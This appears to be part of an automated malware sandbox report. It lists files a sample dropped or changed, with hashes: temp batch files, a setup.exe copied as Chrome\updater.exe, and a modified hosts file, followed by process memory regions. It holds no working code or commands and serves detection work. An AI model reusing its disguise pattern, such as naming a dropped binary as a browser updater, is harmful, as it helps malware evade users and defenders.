                                                          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                                          SHA512

                                                          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                          Filesize

                                                          340B

                                                          MD5

                                                          5a41fd681eebea42a7b694cb423715ea

                                                          SHA1

                                                          258a74e4adb370f14180035aa85846c31f9ed1b2

                                                          SHA256

                                                          51eed034e4d3a35c4e466c7b0b95baf9829912bc66d00f4956d3034420949933

                                                          SHA512

                                                          1226d03372d408ba031f5461a13640407c8f6fa1fccbb24737677b5797cd72aeae2e1e1527942c87a23ea1b7b4cfd2065e5df25701d1ba8592523bb9dabcfc5c

                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                          Filesize

                                                          340B

                                                          MD5

                                                          671eade65416f629e84125ce765a0d30

                                                          SHA1

                                                          fb2a92cfcf5c09aa3a5ad2d44079bc2650e648b1

                                                          SHA256

                                                          678f7a0711b170772e7a41d87a9fbd25b2470b48169c4b684eaa10a5f7524f3f

                                                          SHA512

                                                          f0af78fc4839fe257dc006f8dd0ff47feb1a5eaa58a3879ee9f86981619a0c1040e179731968b8f2393b4eae0c62dd1d0657391079b9ed4034e940ded3f42646

                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
                                                          Filesize

                                                          242B

                                                          MD5

                                                          074f30e6cdae1237dc4d94b487c3bfc7

                                                          SHA1

                                                          ca848b553acf7e253a87faff90ab27792a1fadb2

                                                          SHA256

                                                          92bf14fb98526ee7091d86d0cc3a16bb210750352b57c8cc47e21005d630ffbc

                                                          SHA512

                                                          5f134688fa50be2c46b5eaeb9d98ab1cf03e9d252fc549456675253b90e7c31590c4cb724decc908ec15117199f8fabdf61d57d65ba092a1adc54ba63452ebdc

                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
                                                          Filesize

                                                          242B

                                                          MD5

                                                          90f6de46909ab80d921bb27976e143b3

                                                          SHA1

                                                          9c89333759395cfdbd6656ce8612ac49cb57fc32

                                                          SHA256

                                                          6ef765e44cad6dfba350a373e28d0657f0a37824d517494cd48bdccf0a1dd221

                                                          SHA512

                                                          ee360948031ee5d12e1155d04fd4a58a5fa1229e1ce829841d1b74e46ac0c862d26021d50601a373465a40c465399d07327b58b0f05eec28ffa4617880fd057e

                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
                                                          Filesize

                                                          242B

                                                          MD5

                                                          90f6de46909ab80d921bb27976e143b3

                                                          SHA1

                                                          9c89333759395cfdbd6656ce8612ac49cb57fc32

                                                          SHA256

                                                          6ef765e44cad6dfba350a373e28d0657f0a37824d517494cd48bdccf0a1dd221

                                                          SHA512

                                                          ee360948031ee5d12e1155d04fd4a58a5fa1229e1ce829841d1b74e46ac0c862d26021d50601a373465a40c465399d07327b58b0f05eec28ffa4617880fd057e

                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
                                                          Filesize

                                                          242B

                                                          MD5

                                                          90f6de46909ab80d921bb27976e143b3

                                                          SHA1

                                                          9c89333759395cfdbd6656ce8612ac49cb57fc32

                                                          SHA256

                                                          6ef765e44cad6dfba350a373e28d0657f0a37824d517494cd48bdccf0a1dd221

                                                          SHA512

                                                          ee360948031ee5d12e1155d04fd4a58a5fa1229e1ce829841d1b74e46ac0c862d26021d50601a373465a40c465399d07327b58b0f05eec28ffa4617880fd057e

                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\H8Z3PUJ9.txt
                                                          Filesize

                                                          604B

                                                          MD5

                                                          4035e20ad52d369ee585c0178edc2e67

                                                          SHA1

                                                          b5a60535508657cfe5da964189136d7e551a4c4d

                                                          SHA256

                                                          8a7b4d06382a47152b105dc49130745a74cad9122052aa95ab75fc087bb56e22

                                                          SHA512

                                                          a3d5e27fa805671c95c6b6516d426cca0e1d6640f14fc1c0b5f28f85dc95e46fe0ca247e1693844d22a81378bdd181b504458a71e2327afbd858538e578a034d

                                                        • C:\Windows\Temp\lol.bat
                                                          Filesize

                                                          59B

                                                          MD5

                                                          f580e0e80cc87b25e38ea2c0c8059d04

                                                          SHA1

                                                          299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                          SHA256

                                                          9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                          SHA512

                                                          5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                                        • C:\Windows\Temp\run.bat
                                                          Filesize

                                                          98B

                                                          MD5

                                                          731afe244b2414169a5f630d52646e56

                                                          SHA1

                                                          e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                          SHA256

                                                          6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                          SHA512

                                                          84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                                        • C:\Windows\Temp\setup.exe
                                                          Filesize

                                                          7.3MB

                                                          MD5

                                                          0c9bed327840bbe964e85913d5868fcb

                                                          SHA1

                                                          ef0b874b57be491ae87ed0237a025d5580265218

                                                          SHA256

                                                          3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                          SHA512

                                                          12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                        • C:\Windows\Temp\setup.exe
                                                          Filesize

                                                          7.3MB

                                                          MD5

                                                          0c9bed327840bbe964e85913d5868fcb

                                                          SHA1

                                                          ef0b874b57be491ae87ed0237a025d5580265218

                                                          SHA256

                                                          3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                          SHA512

                                                          12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                        • C:\Windows\system32\drivers\etc\hosts
                                                          Filesize

                                                          1KB

                                                          MD5

                                                          f3f6968a4c0f457f427eb17f7cc5f68b

                                                          SHA1

                                                          872933578f4b7d555158189ed02015f192daa7c6

                                                          SHA256

                                                          774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                                          SHA512

                                                          5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                                        • \Program Files\Chrome\updater.exe
                                                          Filesize

                                                          7.3MB

                                                          MD5

                                                          0c9bed327840bbe964e85913d5868fcb

                                                          SHA1

                                                          ef0b874b57be491ae87ed0237a025d5580265218

                                                          SHA256

                                                          3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                          SHA512

                                                          12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                        • \Windows\Temp\setup.exe
                                                          Filesize

                                                          7.3MB

                                                          MD5

                                                          0c9bed327840bbe964e85913d5868fcb

                                                          SHA1

                                                          ef0b874b57be491ae87ed0237a025d5580265218

                                                          SHA256

                                                          3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                          SHA512

                                                          12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                        • memory/284-69-0x000000001B990000-0x000000001BDAC000-memory.dmp
                                                          Filesize

                                                          4.1MB

                                                        • memory/284-68-0x00000000001E0000-0x00000000005FC000-memory.dmp
                                                          Filesize

                                                          4.1MB

                                                        • memory/284-70-0x000007FEFC4E1000-0x000007FEFC4E3000-memory.dmp
                                                          Filesize

                                                          8KB

                                                        • memory/320-65-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                          Filesize

                                                          12.7MB

                                                        • memory/320-67-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                          Filesize

                                                          12.7MB

                                                        • memory/320-84-0x0000000000000000-mapping.dmp
                                                        • memory/320-63-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                          Filesize

                                                          12.7MB

                                                        • memory/320-56-0x0000000000000000-mapping.dmp
                                                        • memory/320-64-0x0000000077C60000-0x0000000077E09000-memory.dmp
                                                          Filesize

                                                          1.7MB

                                                        • memory/320-66-0x0000000077C60000-0x0000000077E09000-memory.dmp
                                                          Filesize

                                                          1.7MB

                                                        • memory/608-158-0x0000000000000000-mapping.dmp
                                                        • memory/608-205-0x0000000000060000-0x0000000000067000-memory.dmp
                                                          Filesize

                                                          28KB

                                                        • memory/608-203-0x0000000000280000-0x0000000000286000-memory.dmp
                                                          Filesize

                                                          24KB

                                                        • memory/680-107-0x0000000000000000-mapping.dmp
                                                        • memory/744-164-0x0000000000000000-mapping.dmp
                                                        • memory/744-155-0x0000000000000000-mapping.dmp
                                                        • memory/744-99-0x0000000000000000-mapping.dmp
                                                        • memory/844-89-0x0000000000000000-mapping.dmp
                                                        • memory/872-144-0x0000000000000000-mapping.dmp
                                                        • memory/892-168-0x0000000000B80000-0x0000000000B86000-memory.dmp
                                                          Filesize

                                                          24KB

                                                        • memory/932-147-0x0000000000000000-mapping.dmp
                                                        • memory/944-104-0x0000000000000000-mapping.dmp
                                                        • memory/948-123-0x0000000000000000-mapping.dmp
                                                        • memory/1060-125-0x0000000000000000-mapping.dmp
                                                        • memory/1060-127-0x0000000000000000-mapping.dmp
                                                        • memory/1060-130-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                          Filesize

                                                          12.7MB

                                                        • memory/1060-131-0x0000000077C60000-0x0000000077E09000-memory.dmp
                                                          Filesize

                                                          1.7MB

                                                        • memory/1060-132-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                          Filesize

                                                          12.7MB

                                                        • memory/1060-133-0x0000000077C60000-0x0000000077E09000-memory.dmp
                                                          Filesize

                                                          1.7MB

                                                        • memory/1084-154-0x0000000000000000-mapping.dmp
                                                        • memory/1084-162-0x0000000000000000-mapping.dmp
                                                        • memory/1084-85-0x0000000000000000-mapping.dmp
                                                        • memory/1092-145-0x0000000000000000-mapping.dmp
                                                        • memory/1092-105-0x0000000000000000-mapping.dmp
                                                        • memory/1092-78-0x0000000002404000-0x0000000002407000-memory.dmp
                                                          Filesize

                                                          12KB

                                                        • memory/1092-77-0x000000000240B000-0x000000000242A000-memory.dmp
                                                          Filesize

                                                          124KB

                                                        • memory/1092-75-0x000007FEED640000-0x000007FEEE19D000-memory.dmp
                                                          Filesize

                                                          11.4MB

                                                        • memory/1092-79-0x000000000240B000-0x000000000242A000-memory.dmp
                                                          Filesize

                                                          124KB

                                                        • memory/1092-76-0x0000000002404000-0x0000000002407000-memory.dmp
                                                          Filesize

                                                          12KB

                                                        • memory/1092-74-0x000007FEEE1A0000-0x000007FEEEBC3000-memory.dmp
                                                          Filesize

                                                          10.1MB

                                                        • memory/1092-72-0x0000000000000000-mapping.dmp
                                                        • memory/1104-121-0x0000000000000000-mapping.dmp
                                                        • memory/1136-174-0x0000000000400000-0x000000000040C000-memory.dmp
                                                          Filesize

                                                          48KB

                                                        • memory/1136-169-0x0000000000400000-0x000000000040C000-memory.dmp
                                                          Filesize

                                                          48KB

                                                        • memory/1136-170-0x0000000000400000-0x000000000040C000-memory.dmp
                                                          Filesize

                                                          48KB

                                                        • memory/1136-167-0x0000000000000000-mapping.dmp
                                                        • memory/1136-171-0x0000000000400000-0x000000000040C000-memory.dmp
                                                          Filesize

                                                          48KB

                                                        • memory/1136-173-0x0000000000400000-0x000000000040C000-memory.dmp
                                                          Filesize

                                                          48KB

                                                        • memory/1136-175-0x0000000000400000-0x000000000040C000-memory.dmp
                                                          Filesize

                                                          48KB

                                                        • memory/1136-177-0x0000000000400000-0x000000000040C000-memory.dmp
                                                          Filesize

                                                          48KB

                                                        • memory/1136-202-0x0000000000400000-0x000000000040C000-memory.dmp
                                                          Filesize

                                                          48KB

                                                        • memory/1252-90-0x0000000000000000-mapping.dmp
                                                        • memory/1256-95-0x0000000000000000-mapping.dmp
                                                        • memory/1292-159-0x0000000000000000-mapping.dmp
                                                        • memory/1292-124-0x0000000000000000-mapping.dmp
                                                        • memory/1292-143-0x0000000001154000-0x0000000001157000-memory.dmp
                                                          Filesize

                                                          12KB

                                                        • memory/1292-142-0x000000000115B000-0x000000000117A000-memory.dmp
                                                          Filesize

                                                          124KB

                                                        • memory/1292-150-0x0000000000000000-mapping.dmp
                                                        • memory/1292-136-0x0000000000000000-mapping.dmp
                                                        • memory/1292-138-0x000007FEED560000-0x000007FEEDF83000-memory.dmp
                                                          Filesize

                                                          10.1MB

                                                        • memory/1292-139-0x000007FEECA00000-0x000007FEED55D000-memory.dmp
                                                          Filesize

                                                          11.4MB

                                                        • memory/1292-141-0x0000000001154000-0x0000000001157000-memory.dmp
                                                          Filesize

                                                          12KB

                                                        • memory/1300-59-0x0000000000000000-mapping.dmp
                                                        • memory/1304-120-0x0000000000000000-mapping.dmp
                                                        • memory/1336-149-0x0000000000000000-mapping.dmp
                                                        • memory/1400-106-0x0000000000000000-mapping.dmp
                                                        • memory/1400-96-0x0000000000000000-mapping.dmp
                                                        • memory/1448-101-0x0000000000000000-mapping.dmp
                                                        • memory/1500-122-0x0000000000000000-mapping.dmp
                                                        • memory/1504-166-0x0000000000000000-mapping.dmp
                                                        • memory/1512-187-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-189-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-206-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-201-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-200-0x0000000000270000-0x0000000000290000-memory.dmp
                                                          Filesize

                                                          128KB

                                                        • memory/1512-199-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-194-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-195-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-197-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-193-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-191-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-178-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-185-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-188-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-183-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-179-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1512-181-0x0000000140000000-0x0000000140803000-memory.dmp
                                                          Filesize

                                                          8.0MB

                                                        • memory/1536-135-0x0000000000000000-mapping.dmp
                                                        • memory/1568-82-0x0000000000000000-mapping.dmp
                                                        • memory/1580-151-0x0000000000000000-mapping.dmp
                                                        • memory/1580-102-0x0000000000000000-mapping.dmp
                                                        • memory/1584-97-0x0000000000000000-mapping.dmp
                                                        • memory/1616-157-0x0000000000000000-mapping.dmp
                                                        • memory/1676-153-0x0000000000000000-mapping.dmp
                                                        • memory/1676-161-0x0000000000000000-mapping.dmp
                                                        • memory/1676-80-0x0000000000000000-mapping.dmp
                                                        • memory/1696-156-0x0000000000000000-mapping.dmp
                                                        • memory/1696-98-0x0000000000000000-mapping.dmp
                                                        • memory/1700-94-0x0000000000000000-mapping.dmp
                                                        • memory/1724-160-0x0000000000000000-mapping.dmp
                                                        • memory/1724-152-0x0000000000000000-mapping.dmp
                                                        • memory/1724-71-0x0000000000000000-mapping.dmp
                                                        • memory/1728-129-0x0000000001170000-0x0000000001E2D000-memory.dmp
                                                          Filesize

                                                          12.7MB

                                                        • memory/1728-140-0x0000000001170000-0x0000000001E2D000-memory.dmp
                                                          Filesize

                                                          12.7MB

                                                        • memory/1792-54-0x0000000076461000-0x0000000076463000-memory.dmp
                                                          Filesize

                                                          8KB

                                                        • memory/1820-88-0x0000000000000000-mapping.dmp
                                                        • memory/1860-93-0x0000000000000000-mapping.dmp
                                                        • memory/1916-58-0x0000000000000000-mapping.dmp
                                                        • memory/1932-83-0x0000000000000000-mapping.dmp
                                                        • memory/1948-165-0x0000000000000000-mapping.dmp
                                                        • memory/1980-103-0x0000000000000000-mapping.dmp
                                                        • memory/1980-91-0x0000000000000000-mapping.dmp
                                                        • memory/1984-148-0x0000000000000000-mapping.dmp
                                                        • memory/1984-86-0x0000000000000000-mapping.dmp
                                                        • memory/2012-87-0x0000000000000000-mapping.dmp
                                                        • memory/2016-92-0x0000000000000000-mapping.dmp
                                                        • memory/2032-163-0x0000000000000000-mapping.dmp
                                                        • memory/2036-81-0x0000000000000000-mapping.dmp